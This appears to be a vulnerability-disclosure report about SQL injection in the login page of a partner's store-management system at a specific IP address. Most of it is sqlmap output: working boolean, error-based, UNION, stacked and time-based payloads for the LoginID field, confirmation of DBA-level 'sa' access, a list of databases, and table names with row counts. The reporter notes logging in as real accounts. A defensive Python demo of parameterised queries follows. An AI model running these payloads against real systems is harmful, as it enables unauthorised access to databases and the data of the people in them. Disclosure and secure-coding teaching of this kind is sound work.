2015-12-21: Details sent to the vendor; awaiting the vendor's handling
2015-12-21: Vendor confirmed; details visible to the vendor only
2015-12-31: Details disclosed to core white hats and domain experts
2016-01-10: Details disclosed to regular white hats
2016-01-20: Details disclosed to intern white hats
2016-02-01: Details disclosed to the public
Injection point:
http://222.209.200.74:8000/login.aspx (POST) LoginID=admin&loginPassword=123456&imageField.x=41&imageField.y=23
The LoginID parameter is injectable.
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: LoginID
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: LoginID=admin' AND 8798=8798 AND 'nyPE'='nyPE&loginPassword=123456&imageField.x=41&imageField.y=23

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: LoginID=admin' AND 1371=CONVERT(INT,(SELECT CHAR(113)+CHAR(108)+CHAR(97)+CHAR(114)+CHAR(113)+(SELECT (CASE WHEN (1371=1371) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(109)+CHAR(102)+CHAR(110)+CHAR(113))) AND 'bwsZ'='bwsZ&loginPassword=123456&imageField.x=41&imageField.y=23

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: LoginID=admin' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(108)+CHAR(97)+CHAR(114)+CHAR(113)+CHAR(89)+CHAR(76)+CHAR(83)+CHAR(89)+CHAR(81)+CHAR(101)+CHAR(70)+CHAR(73)+CHAR(69)+CHAR(116)+CHAR(113)+CHAR(109)+CHAR(102)+CHAR(110)+CHAR(113)-- &loginPassword=123456&imageField.x=41&imageField.y=23

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: LoginID=admin'; WAITFOR DELAY '0:0:5'--&loginPassword=123456&imageField.x=41&imageField.y=23

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: LoginID=admin' WAITFOR DELAY '0:0:5'--&loginPassword=123456&imageField.x=41&imageField.y=23
---
[03:12:51] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[03:12:51] [INFO] fetching current user
current user: 'sa'
[03:12:52] [INFO] fetching current database
current database: 'zhongduan'
[03:12:52] [INFO] testing if current user is DBA
current user is DBA: True
database management system users [1]:
[*] sa
available databases [18]:
[*] BC40Fee
[*] CallCenter
[*] chugui
[*] drpsys
[*] drpsysww
[*] hdcd
[*] jidiao
[*] leilu
[*] master
[*] model
[*] msdb
[*] nEWASSDB
[*] qiaofuren
[*] shuaikang
[*] tempdb
[*] VantageCNT
[*] yangwei
[*] zhongduan
Database: zhongduan
+------------------------------------------------+---------+
| Table                                          | Entries |
+------------------------------------------------+---------+
| dbo.Main_Log                                   | 26577   |
| dbo.Main_OperationLog                          | 11439   |
| dbo.Store_ProductDetail                        | 5140    |
| dbo.View_Store_UpperAndLowerProductQuery       | 5140    |
| dbo.View_Main_UserFunction                     | 3370    |
| dbo.Store_Duty                                 | 2941    |
| dbo.View_Store_Duty                            | 2941    |
| dbo.View_Store_ShoppingGuideWorkConditionQuery | 2941    |
| dbo.Frame_Field                                | 938     |
| dbo.Store_Sales                                | 720     |
| dbo.View_Store_SalesStatistics                 | 720     |
| dbo.View_StoreSales                            | 720     |
| dbo.ViewSales                                  | 720     |
| dbo.Frame_RoleOperating                        | 625     |
| dbo.Main_Photo                                 | 400     |
| dbo.View_Main_Photo                            | 400     |
| dbo.View_ShowPhotoList                         | 400     |
| dbo.Products                                   | 364     |
| dbo.View_StoreProducts                         | 364     |
| dbo.Store_DailyReport                          | 363     |
| dbo.View_StoreDailyReportk                     | 363     |
| dbo.Main_RoleFunction                          | 301     |
| dbo.View_StorePhotoExt                         | 192     |
| dbo.Store_Info                                 | 191     |
| dbo.Store_CrewScheduling                       | 189     |
| dbo.View_Store_CrewScheduling                  | 189     |
| dbo.View_StoreMap                              | 183     |
| dbo.Store_Staff                                | 165     |
| dbo.View_DGYCX                                 | 165     |
| dbo.View_Store_Staff                           | 165     |
| dbo.View_Store_Product                         | 164     |
| dbo.Frame_Operating                            | 129     |
| dbo.Main_Dictionary                            | 100     |
| dbo.View_Main_Dictionary                       | 100     |
| dbo.ReceiptMaxNumber                           | 78      |
| dbo.Main_UserRole                              | 71      |
| dbo.ViewDailyReport                            | 66      |
| dbo.Frame_Program                              | 55      |
| dbo.Main_Function                              | 52      |
| dbo.Frame_Object                               | 43      |
| dbo.Main_ProucetRef                            | 43      |
| dbo.Main_User                                  | 33      |
| dbo.Store_ProductType                          | 31      |
| dbo.Store_Location                             | 22      |
| dbo.Main_DictionaryType                        | 19      |
| dbo.Store_LeaseApproach                        | 19      |
| dbo.View_Store_LeaseApproach                   | 19      |
| dbo.Store_Advertising                          | 13      |
| dbo.View_Store_Advertising                     | 13      |
| dbo.Frame_FieldType                            | 12      |
| dbo.Department                                 | 11      |
| dbo.Main_OrganizationType                      | 9       |
| dbo.Store_CostType                             | 7       |
| dbo.View_Store_CostType                        | 7       |
| dbo.Store_CostAttribute                        | 6       |
| dbo.Main_FileCategory                          | 3       |
| dbo.Main_LoadCompany                           | 3       |
| dbo.Main_Config                                | 2       |
| dbo.Main_Application                           | 1       |
| dbo.Main_Department                            | 1       |
| dbo.Store_DecorationDetail                     | 1       |
| dbo.View_CostStatistics                        | 1       |
| dbo.View_Decoration                            | 1       |
| dbo.View_Store_DecorationMaterials             | 1       |
| dbo.View_StoreCost                             | 1       |
| dbo.View_StoreDecoration                       | 1       |
+------------------------------------------------+---------+
Logged in as admin and chenfei to verify.
DBA privileges, as shown in the screenshot; did not go any further.
As above.
Fix: filter the input.
Severity: Low
Vulnerability Rank: 5
Confirmed: 2015-12-21 14:01
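The report's finding is a login form whose LoginID value is spliced into SQL text, and its fix recommendation is to filter the input. The example below is added here and is not code from the report or from the affected application; it is a constructed stand-in (Python with an in-memory SQLite table and made-up users) that shows why the sqlmap boolean probe quoted in the report authenticates against a string-concatenated query but not against a parameterised one, and layers the recommended allowlist filter on top. The user table, the password values and the LOGIN_ID_PATTERN allowlist are assumptions for the demo.

```python
import re
import sqlite3

# Constructed sample user table for the demo (not data from the report).
# Passwords are stored in plaintext only to keep the example short; a real
# application compares a password hash instead.
SAMPLE_USERS = [("admin", "123456"), ("chenfei", "s3cret")]

# sqlmap's boolean-based probe from the report, as it arrives in LoginID.
BOOLEAN_PROBE = "admin' AND 8798=8798 AND 'nyPE'='nyPE"

# Allowlist for the "filter" fix (assumed policy): letters, digits, underscore.
LOGIN_ID_PATTERN = re.compile(r"^[A-Za-z0-9_]{1,32}$")


def make_db():
    """Build the in-memory table the demo queries."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (LoginID TEXT, Password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def login_concat(conn, login_id, password):
    """Vulnerable pattern: user input spliced into the SQL text.

    With BOOLEAN_PROBE the statement becomes
    ... WHERE LoginID='admin' AND 8798=8798 AND 'nyPE'='nyPE' AND Password='123456'
    so the quote in the input has changed the query's structure.
    """
    sql = ("SELECT COUNT(*) FROM users WHERE LoginID='%s' AND Password='%s'"
           % (login_id, password))
    return conn.execute(sql).fetchone()[0] > 0


def login_param(conn, login_id, password):
    """Fixed pattern: the driver binds the values, so quotes in the input are data."""
    sql = "SELECT COUNT(*) FROM users WHERE LoginID=? AND Password=?"
    return conn.execute(sql, (login_id, password)).fetchone()[0] > 0


def is_valid_login_id(login_id):
    """Input filter, the fix the report asks for; a defence-in-depth layer."""
    return LOGIN_ID_PATTERN.match(login_id) is not None


def login_filtered(conn, login_id, password):
    """Reject malformed login names first, then use the parameterised query."""
    if not is_valid_login_id(login_id):
        return False
    return login_param(conn, login_id, password)


def compare(conn):
    """How each variant treats a normal login versus sqlmap's probe."""
    return {
        "normal_concat": login_concat(conn, "admin", "123456"),
        "normal_param": login_param(conn, "admin", "123456"),
        "probe_concat": login_concat(conn, BOOLEAN_PROBE, "123456"),
        "probe_param": login_param(conn, BOOLEAN_PROBE, "123456"),
        "probe_filtered": login_filtered(conn, BOOLEAN_PROBE, "123456"),
    }


if __name__ == "__main__":
    for name, result in compare(make_db()).items():
        print(name, result)
```

The concatenated version returns True for the probe because the injected condition is evaluated as SQL, which is exactly the true/false oracle sqlmap's boolean-based blind technique relies on; the parameterised version treats the whole string as a login name that does not exist, so the oracle disappears. Filtering alone is a weaker fix than parameterisation because it depends on the allowlist being right for every field, so the two are best used together.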
This is not our company's system; it is a partner's application system. On their behalf we thank 路人甲, but they do not have the ability to fix it. Please do not make it public. Thank you.
None.